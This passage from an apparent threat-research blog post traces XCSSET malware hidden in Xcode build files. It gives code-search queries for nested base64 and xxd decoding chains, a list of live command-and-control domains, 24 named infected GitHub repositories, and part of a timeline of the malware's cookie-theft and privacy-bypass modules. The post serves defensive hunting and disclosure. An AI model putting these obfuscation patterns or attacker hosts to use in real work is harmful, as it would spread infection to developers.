class=\"sq-quote\">\"<\/span> <span class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">-d<\/span> <span class=\"sq-pipe\">|<\/span> <span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">-d<\/span><span class=\"sq-quote\">\"<\/span>\n<span class=\"sq-filter\">path:<\/span><span class=\"sq-path\">project.pbxproj<\/span> <span class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">echo<\/span><span class=\"sq-quote\">\"<\/span> <span class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">xxd<\/span> <span class=\"sq-flag\">-p -r<\/span> <span class=\"sq-pipe\">|<\/span> <span class=\"sq-cmd\">xxd<\/span> <span class=\"sq-flag\">-p -r<\/span><span class=\"sq-quote\">\"<\/span>\n<span class=\"sq-filter\">path:<\/span><span class=\"sq-path\">project.pbxproj<\/span> <span class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">--decode<\/span> <span class=\"sq-pipe\">|<\/span> <span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">--decode<\/span> <span class=\"sq-pipe\">|<\/span> <span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">--decode<\/span><span class=\"sq-quote\">\"<\/span><\/pre><\/div>\n  <\/div>\n<\/div>\n<div>\n\n\n\n<p>IoC domain list for SOC alerting and DNS-level filtering (compiled from Joshi 2025, our live sample, and the findings above):<\/p>\n\n\n\n<div>\n<style>\n  .sq-outer {\n    font-family: sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .sq-block {\n    background: #fafbff;\n    overflow: hidden;\n  }\n\n  .sq-topbar {\n    display: flex;\n    align-items: center;\n    gap: 6px;\n    padding: 8px 14px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .sq-dot { width: 9px; height: 9px; border-radius: 50%; }\n  .sq-dot-r { background: #FF5F57; }\n  .sq-dot-y { background: #FEBC2E; }\n  .sq-dot-g { background: #28C840; }\n\n  .sq-code {\n    padding: 16px 20px;\n    overflow-x: auto;\n  }\n\n  .sq-domains {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 12.5px;\n    line-height: 2;\n    margin: 0;\n    display: flex;\n    flex-wrap: wrap;\n    gap: 6px 0;\n  }\n\n  .sq-domain {\n    color: #00A696;\n    font-weight: 500;\n    white-space: nowrap;\n  }\n\n  .sq-sep {\n    color: #c2c6e8;\n    margin: 0 2px;\n  }\n<\/style>\n<div class=\"sq-outer\">\n  <div class=\"sq-block\">\n    <div class=\"sq-topbar\">\n      <div class=\"sq-dot sq-dot-r\"><\/div>\n      <div class=\"sq-dot sq-dot-y\"><\/div>\n      <div class=\"sq-dot sq-dot-g\"><\/div>\n    <\/div>\n    <div class=\"sq-code\">\n      <div class=\"sq-domains\">\n        <span class=\"sq-domain\">adobetrix.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">adobecdn.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">bulksec.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">cdnroute.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">checkcdn.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">diggimax.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">digichat.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">figmastars.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">fixmates.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">mdscache.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">rublenet.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">sigmanow.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">trinitysol.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">windsecure.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">castlenet.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">riggletoy.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">netcdndev.in<\/span>\n      <\/div>\n    <\/div>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>riggletoy.ru is the link between the public repositories and our live sample. netcdndev.in is a new domain that had not appeared in any prior research before this investigation.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"the-bigger-picture\">The Bigger Picture<\/h2>\n\n\n\n<p>This investigation started with a single anomalous osascript call. It ended with 24 infected repositories, a live C2 domain absent from every public threat intelligence feed, and a confirmed link between one workstation and an active GitHub distribution campaign.<\/p>\n\n\n\n<p>That escalation is not incidental \u2013 it is the design. XCSSET doesn&#8217;t need a broad reach. It needs one developer to clone one repository and hit Build. Everything after that is automatic. The 82 commits stacked on top of an undetected infection in NandaMocha\/Reflect illustrate what that looks like in practice: the developer kept working, kept shipping, had no idea.<\/p>\n\n\n\n<p>Two details from this investigation go beyond what prior research documented.&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>First, netcdndev.in, found in xiaoyouPrince\/XYDevTool, does not appear in any existing IoC list. The operators are rotating infrastructure faster than public feeds can track it.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Second, riggletoy.ru links a live workstation infection directly to a public GitHub repository, meaning the distribution chain isn&#8217;t hypothetical. It ran. It may still be running.<\/li>\n<\/ul>\n\n\n<div class=\"block__bord\"><div class=\"block__bord_desc\"><p>The threat persists not because it&#8217;s technically sophisticated, but because it hides in the one artifact developers routinely share without reading: the build file. That&#8217;s the actual attack surface, and it&#8217;s been open for five years.<\/p>\n<\/div><\/div>\n<style>\n.block__bord { margin: 32px 0; padding: 1.25em 2.375em;\tborder-radius: 24px; background: rgba(0, 220, 200, 0.20); }\n.block__bord_desc {font-size: 16px !important;font-weight: 400 !important;color: #606060 !important;}\n<\/style>\n\n\n\n<p>For Adex, this isn&#8217;t adjacent to the core work \u2013 it is the core work. Fraud and malware share infrastructure, and the same compromised machine that spreads XCSSET through a developer&#8217;s repositories can silently drain ad platform accounts for months. We look for this because we have to. We publish it because others need to know.<\/p>\n\n\n<div class=\"block__preview\">\n        <a href=\"https:\/\/adex.com\/blog\/abuse-of-trusted-domains-in-igaming\/\" class=\"block__preview_img\"><img src=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/02\/Adex-Subdomain-Takeover-Case-Study.png\" srcset=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/02\/Adex-Subdomain-Takeover-Case-Study.png\" sizes=\"100vw\" alt=\"Adex-Subdomain-Takeover-Case-Study\" decoding=\"async\" class=\"lazy\"><\/a>\n    <div class=\"block__preview_box\">\n        <a href=\"https:\/\/adex.com\/blog\/category\/guides\/\" class=\"block__preview_box-cat\">Guides<\/a>        <h3 class=\"block__preview_box-title\" id=\"adex-detects-abuse-of-trusted-domains-in-igaming-advertising-campaigns\"><a href=\"https:\/\/adex.com\/blog\/abuse-of-trusted-domains-in-igaming\/\">Adex Detects Abuse of Trusted Domains in iGaming Advertising Campaigns<\/a><\/h3>\n    <\/div>\n<\/div>\n<style>\n.block__preview {display: flex;align-items: center;justify-content: center; margin: 32px 0;}\n.block__preview a {text-decoration: none;}\n.block__preview_img {min-width: 360px;max-width: 360px;min-height: 188px;width: 100%;height: 100%;}\n.block__preview_img img {width: 100%;height: 100%;}\n.block__preview_box {margin-left: 40px;max-width: 360px;}\n.block__preview_box-cat {color: #00B8A7 !important;font-weight: 600;font-size: 12px;line-height: 16px;text-transform: uppercase; display: block; margin-bottom: 4px;}\n.block__preview_box-cat:hover {color: #FE645A !important; text-decoration: none !important;}\n.block__preview_box-title {font-size: 20px;font-weight: 700;line-height: 24px;color: #0B172D;}\n.block__preview_box-title a {color: #0B172D !important;}\n.block__preview_box-title a:hover {color: #FE645A !important;}\n@media screen and (max-width: 768px) {.block__preview {flex-direction: column;}.block__preview_box {max-width: 100%; margin-top: 32px;margin-left: 0px;}.block__preview_img {max-width: 100%;min-width: 100%;min-height: 100%;}}<\/style>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"appendix-1-full-list-24-repositories\">Appendix #1: Full List (24 repositories)<\/h2>\n\n\n\n<p>Each repository below was inspected by hand: project.pbxproj was opened as plain text, the encoded string was extracted and decoded through the full iteration chain, and the resulting command was confirmed to contain a C2 call matching known XCSSET infrastructure. No automated scanner was used.<\/p>\n\n\n\n<div>\n<style>\n  .tbl-outer {\n    font-family: sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .tbl-header {\n    padding: 24px 28px 20px;\n    border-bottom: 1px solid #e8eaf5;\n    background: #fafbff;\n  }\n\n  .tbl-heading {\n    font-size: 18px;\n    font-weight: 700;\n    color: #0F0063;\n    line-height: 1.3;\n  }\n\n  .tbl-sub {\n    font-size: 13px;\n    color: #4a4f7a;\n    margin-top: 4px;\n    line-height: 1.5;\n  }\n\n  .tbl-scroll {\n    overflow-x: auto;\n  }\n\n  .tbl-outer table {\n    width: 100%;\n    border-collapse: collapse;\n    min-width: 480px;\n  }\n\n  .tbl-outer thead th {\n    background: #f2f4fc;\n    color: #8b90b8;\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    padding: 10px 20px;\n    text-align: left;\n    border-bottom: 1px solid #e8eaf5;\n    white-space: nowrap;\n  }\n\n  .tbl-outer tbody tr {\n    border-bottom: 1px solid #f0f2fa;\n    transition: background 0.15s;\n  }\n\n  .tbl-outer tbody tr:last-child {\n    border-bottom: none;\n  }\n\n  .tbl-outer tbody tr:hover {\n    background: #f7f8fd;\n  }\n\n  .tbl-outer td {\n    padding: 12px 20px;\n    vertical-align: middle;\n  }\n\n  .tbl-repo {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11.5px;\n    font-weight: 500;\n    color: #0F0063;\n    white-space: nowrap;\n  }\n\n  .tbl-repo-owner {\n    color: #8b90b8;\n    font-weight: 400;\n  }\n\n  .tbl-proj-tag {\n    display: inline-block;\n    font-size: 10px;\n    font-weight: 600;\n    letter-spacing: 0.05em;\n    padding: 2px 9px;\n    border-radius: 20px;\n    white-space: nowrap;\n  }\n\n  .tbl-proj-swift   { background: #fff0ef; color: #FF645A; }\n  .tbl-proj-flutter { background: #ede9fe; color: #A05DD2; }\n  .tbl-proj-macos   { background: #e8f7f5; color: #007a6e; }\n  .tbl-proj-objc    { background: #f0f1fc; color: #0F0063; }\n  .tbl-proj-rn      { background: #fef3c7; color: #b45309; }\n  .tbl-proj-mixed   { background: #f5f0fc; color: #7c3aed; }\n\n  .tbl-date {\n    font-size: 12px;\n    color: #4a4f7a;\n    white-space: nowrap;\n  }\n\n  .tbl-date-none {\n    font-size: 12px;\n    color: #c2c6e8;\n    white-space: nowrap;\n  }\n<\/style>\n<div class=\"tbl-outer\">\n  <div class=\"tbl-header\">\n    <div class=\"tbl-heading\">Affected GitHub Repositories<\/div>\n    <div class=\"tbl-sub\">24 public projects found carrying active XCSSET payloads.<\/div>\n  <\/div>\n  <div class=\"tbl-scroll\">\n    <table>\n      <thead>\n        <tr>\n          <th>Repository<\/th>\n          <th>Type<\/th>\n          <th>Date<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">usamajaved357\/<\/span>Breezy<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">SwiftUI<\/span><\/td>\n          <td><span class=\"tbl-date\">March 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">xiaoyouPrince\/<\/span>XYDevTool<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-macos\">macOS Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">rjkalola\/<\/span>OTMS-2.0-Flutter<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">evaradating-art\/<\/span>evara-ios<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">Jayluu2202\/<\/span>Budget-Planner-Rewamped<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">SwiftUI<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">shankarsharma\/<\/span>Broking<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-objc\">Objective-C<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">prodev-mob\/<\/span>screen-time-ios<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">March 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">ktech643\/<\/span>AI-Auto-Attendance<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">March 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">Liqiankun\/<\/span>RepackIssueDemo<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-mixed\">JS + Flutter iOS<\/span><\/td>\n          <td><span class=\"tbl-date\">March 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">MVP-Applications\/<\/span>qibla_flutter<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">Shohruhmirzo05\/<\/span>Salom-AI-Mobile<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-mixed\">Swift + Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">NandaMocha\/<\/span>Reflect<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">dretp\/<\/span>ascend_bible<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">shivsupekar\/<\/span>ScreenShotPreventer<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">NandaMocha\/<\/span>ImageRoullette<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">JeckyKukadiya\/<\/span>BT-Connect<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">kemad97\/<\/span>ProductsApp<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">asoapp-web\/<\/span>RainSport<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">RainyofSun\/<\/span>CYSwiftExtension<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-objc\">Objective-C<\/span><\/td>\n          <td><span class=\"tbl-date\">January 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">mayankbagauli79\/<\/span>AcharyaPrashantDemoApp<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">December 2025<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">sdsahdev\/<\/span>flowChatDoc<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-mixed\">TypeScript + Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">November 2025<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">dvillegastech\/<\/span>ReaxBD<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter\/Dart<\/span><\/td>\n          <td><span class=\"tbl-date\">October 2025<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">PrinceMittal1\/<\/span>DemoForAuthFlow<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-rn\">React Native<\/span><\/td>\n          <td><span class=\"tbl-date-none\">\u2014<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">zzzznick\/<\/span>dummy-ios<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-objc\">ObjC \/ Swift<\/span><\/td>\n          <td><span class=\"tbl-date-none\">\u2014<\/span><\/td>\n        <\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"key-observations\"><strong>Key observations<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>First, usamajaved357\/Breezypulls its payload from riggletoy.ru \u2013 the same C2 confirmed in our live sample in Section 4. This places both within the same campaign; the workstation analyzed earlier was likely infected via one of these public Xcode projects, though the exact vector cannot be established without forensic access to the machine.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>Second, <\/em><em>xiaoyouPrince\/XYDevTool<\/em><em>uses <\/em><em>netcdndev.in<\/em><em>, a domain that does not appear in any public IoC list to date \u2013 a new branch of the campaign&#8217;s infrastructure.&nbsp;<\/em><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>Third, 12 of the 24 repositories received a commit in 2026, the most recent just one day before inspection. XCSSET is actively spreading right now.<\/em><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"appendix-2-csset-timeline\">Appendix #2: CSSET Timeline<\/h2>\n\n\n\n<div>\n<style>\n  .cssetTimeline { background: transparent; padding: 32px 16px; }\n  .wrap {\n    font-family: sans-serif;\n    background: #ffffff;\n    color: #0F0063;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .section-label {\n    font-size: 12px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    color: #00DBC7;\n    margin-bottom: 8px;\n  }\n\n  .section-heading {\n    font-size: 22px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 6px;\n    line-height: 1.3;\n  }\n\n  .section-sub {\n    font-size: 13.5px;\n    color: #6b70a0;\n    margin-bottom: 24px;\n    line-height: 1.6;\n  }\n\n  \/* LEGEND *\/\n  .legend {\n    display: flex;\n    gap: 18px;\n    flex-wrap: wrap;\n    margin-bottom: 28px;\n    padding: 12px 16px;\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 10px;\n  }\n  .legend-item {\n    display: flex;\n    align-items: center;\n    gap: 7px;\n    font-size: 11px;\n    color: #4a4f7a;\n    font-weight: 500;\n  }\n  .legend-dot {\n    width: 10px;\n    height: 10px;\n    border-radius: 50%;\n    flex-shrink: 0;\n  }\n  .legend-dot.verified  { background: #00DBC7; }\n  .legend-dot.approx    { background: transparent; border: 2px dashed #8890c0; width: 12px; height: 12px; }\n  .legend-dot.keyevent  { background: #FF645A; }\n  .legend-dot.adex      { background: #FF8C42; }\n\n  \/* FLOW *\/\n  .flow { display: flex; flex-direction: column; }\n\n  .flow-step {\n    display: flex;\n    align-items: flex-start;\n    gap: 16px;\n    position: relative;\n  }\n\n  .flow-step:not(:last-child)::after {\n    content: '';\n    position: absolute;\n    left: 19px;\n    top: 44px;\n    width: 2px;\n    height: calc(100% - 12px);\n    background: linear-gradient(to bottom, #00DBC7, #00DBC722);\n  }\n\n  .step-icon {\n    width: 40px;\n    height: 40px;\n    border-radius: 50%;\n    background: #f0fdfb;\n    border: 2px solid #00DBC7;\n    display: flex;\n    align-items: center;\n    justify-content: center;\n    flex-shrink: 0;\n    font-size: 16px;\n    position: relative;\n    z-index: 1;\n    box-shadow: 0 2px 10px rgba(0,219,199,0.15);\n  }\n  .step-icon.approx {\n    background: #f4f5fb;\n    border: 2px dashed #a0a8d0;\n    box-shadow: none;\n  }\n  .step-icon.major {\n    background: #fff5f0;\n    border: 2px solid #FF645A;\n    box-shadow: 0 2px 10px rgba(255,100,90,0.15);\n  }\n  .step-icon.adex {\n    background: #fff3eb;\n    border: 2px solid #FF8C42;\n    box-shadow: 0 2px 10px rgba(255,140,66,0.2);\n  }\n\n  .step-body {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    padding: 16px 20px;\n    flex: 1;\n    margin-bottom: 16px;\n    box-shadow: 0 2px 8px rgba(15,0,99,0.04);\n  }\n  .step-body.approx {\n    background: #f7f8fd;\n    border: 1px dashed #c8cce0;\n    box-shadow: none;\n  }\n  .step-body.major {\n    background: #fffafa;\n    border-color: #ffd6d4;\n  }\n  .step-body.adex {\n    background: #fff8f3;\n    border-color: #ffdec7;\n  }\n\n  .step-meta {\n    display: flex;\n    align-items: center;\n    gap: 7px;\n    margin-bottom: 6px;\n    flex-wrap: wrap;\n  }\n\n  .step-date         { font-size: 11px; font-weight: 700; letter-spacing: 0.08em; text-transform: uppercase; color: #00A696; }\n  .step-date.approx  { color: #8890c0; }\n  .step-date.major   { color: #c03030; }\n  .step-date.adex    { color: #b04800; }\n\n  .step-tag {\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.07em;\n    text-transform: uppercase;\n    padding: 2px 8px;\n    border-radius: 20px;\n    display: inline-block;\n  }\n  .tag-verified  { background: #e4fdf8; color: #007A6E; border: 1px solid #a0ede0; }\n  .tag-approx    { background: #f0f1f8; color: #6068a0; border: 1px solid #c8cce0; }\n  .tag-major     { background: #fff0ef; color: #c03030; border: 1px solid #ffcece; }\n  .tag-adex      { background: #fff0e0; color: #b04800; border: 1px solid #ffd0a0; }\n  .tag-neutral   { background: #ede9fe; color: #6D28D9; }\n  .tag-research  { background: #e6eeff; color: #1a4fba; }\n\n  .step-title {\n    font-size: 15px;\n    font-weight: 600;\n    color: #0F0063;\n    margin-bottom: 6px;\n  }\n  .step-desc {\n    font-size: 13px;\n    color: #4a4f7a;\n    line-height: 1.65;\n  }\n  .step-desc strong { color: #0F0063; }\n\n  code {\n    font-family: 'Courier New', monospace;\n    font-size: 11.5px;\n    background: #f0f2fc;\n    padding: 1px 5px;\n    border-radius: 4px;\n    color: #0F0063;\n  }\n  .step-body.adex code { background: #ffebd8; color: #7a2c00; }\n\n  .note {\n    margin-top: 20px;\n    background: #f0fdfb;\n    border-left: 3px solid #00DBC7;\n    border-radius: 0 10px 10px 0;\n    padding: 14px 18px;\n    font-size: 12.5px;\n    color: #4a4f7a;\n    line-height: 1.7;\n  }\n  .note strong { color: #0F0063; }\n\n  @media (max-width: 600px) {\n    .section-heading { font-size: 18px; }\n    .wrap { padding: 28px 16px; }\n    body { padding: 16px 8px; }\n    .legend { gap: 10px; }\n  }\n<\/style>\n<div class=\"cssetTimeline\">\n<div class=\"wrap\">\n\n  <div class=\"section-label\">XCSSET \u00b7 Threat Timeline<\/div>\n  <div class=\"section-heading\">Five Years in the Wild<\/div>\n  <div class=\"section-sub\">From an obscure macOS behavior documented in 2018 to active C2 infrastructure still running in April 2026.<\/div>\n\n  <div class=\"legend\">\n    <div class=\"legend-item\"><span class=\"legend-dot verified\"><\/span> Date verified from primary source<\/div>\n    <div class=\"legend-item\"><span class=\"legend-dot approx\"><\/span> Approximate date (secondary source)<\/div>\n    <div class=\"legend-item\"><span class=\"legend-dot keyevent\"><\/span> Key public event<\/div>\n    <div class=\"legend-item\"><span class=\"legend-dot adex\"><\/span> Adex field research<\/div>\n  <\/div>\n\n  <div class=\"flow\">\n\n    <!-- 1 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83d\udd0d<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ 2018<\/span>\n          <span class=\"step-tag tag-approx\">Precursor<\/span>\n        <\/div>\n        <div class=\"step-title\">The Behavior That Made It Possible<\/div>\n        <div class=\"step-desc\">Phil Stokes (SentinelOne) documents how macOS automatically grants Remote Login (<code>sshd<\/code>) Full Disk Access. Two years later, XCSSET exploits this exact mechanism to bypass TCC privacy folder protections without triggering a user prompt.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 2 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83e\udda0<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ June 2020<\/span>\n          <span class=\"step-tag tag-approx\">First Samples<\/span>\n        <\/div>\n        <div class=\"step-title\">In the Wild \u2014 Undetected<\/div>\n        <div class=\"step-desc\">First XCSSET components appear on VirusTotal. Intego&#8217;s analysis cites upload dates of 19\u201320 June based on their own telemetry. The malware is already spreading \u2014 unattributed, unnamed, and undetected by the industry.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 3 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83d\udd12<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ July 2020<\/span>\n          <span class=\"step-tag tag-approx\">Silent Patch<\/span>\n        <\/div>\n        <div class=\"step-title\">Apple Knows Something<\/div>\n        <div class=\"step-desc\">Apple silently adds XProtect signature <code>MACOS.2070d41<\/code> \u2014 no public explanation, no industry notification. AV vendors spend weeks guessing what it catches. The date is based on Intego&#8217;s monitoring of XProtect update logs.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 4 \u2014 VERIFIED -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon major\">\ud83d\udce2<\/div>\n      <div class=\"step-body major\">\n        <div class=\"step-meta\">\n          <span class=\"step-date major\">August 13, 2020<\/span>\n          <span class=\"step-tag tag-major\">Public Disclosure<\/span>\n          <span class=\"step-tag tag-verified\">\u2713 Verified<\/span>\n        <\/div>\n        <div class=\"step-title\">Trend Micro &amp; Intego Name XCSSET<\/div>\n        <div class=\"step-desc\">Trend Micro publicly discloses XCSSET \u2014 date confirmed by the original blog post. Two zero-days are documented: <strong>(1) a Data Vault \/ TCC bypass<\/strong> granting access to privacy-protected folders without user prompt, and <strong>(2) a Safari UXSS exploit<\/strong> that injects JavaScript into the browser to steal live session cookies. Additional modules cover Telegram message exfiltration, Notes access, and a ransomware component. Intego publishes concurrent independent analysis the same day, estimating at least <strong>380 victim IPs<\/strong> already compromised. Initial victims are concentrated among Apple developers in <strong>Asia-Pacific<\/strong>.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 5 -->\n    <div 